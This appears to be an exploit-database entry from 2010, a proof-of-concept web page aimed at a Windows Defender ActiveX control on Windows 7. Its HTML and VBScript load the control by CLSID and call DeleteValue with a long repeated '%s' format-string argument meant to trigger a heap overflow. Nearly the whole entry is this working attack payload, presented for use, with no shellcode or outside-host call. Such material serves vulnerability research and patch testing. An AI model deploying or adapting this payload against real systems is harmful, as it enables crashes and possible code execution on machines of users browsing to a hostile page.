Microsoft Windows Defender Active-X heap overflow proof of concept exploit. Version 1 of this exploit.
2708df7f823d1b63b5cf97623c36b7194467a52b812f8f3560d7bbb34e6650a9
#Aouther : [SarBoT511]
#Exploits title :[Microsoft Windows Defender ActiveX Heap Overflow PoC]
#downloads :[www.microsoft.com]
#Date : [2010/01/19]
#tested on :[windows 7]
#Microsoft Windows Defender
<html>
<object classid='clsid:07DD3249-A591-4949-8F20-09CD347C69DC' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Windows Defender\MsMpCom.dll"
prototype = "Sub DeleteValue ( ByVal bstrKeyName As String , ByVal bstrValueName As String )"
memberName = "DeleteValue"
progid = "MpComExportsLib.MsMpSimpleConfig"
argCount = 2
arg1="defaultV"
arg2="%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s"
target.DeleteValue arg1 ,arg2
</script>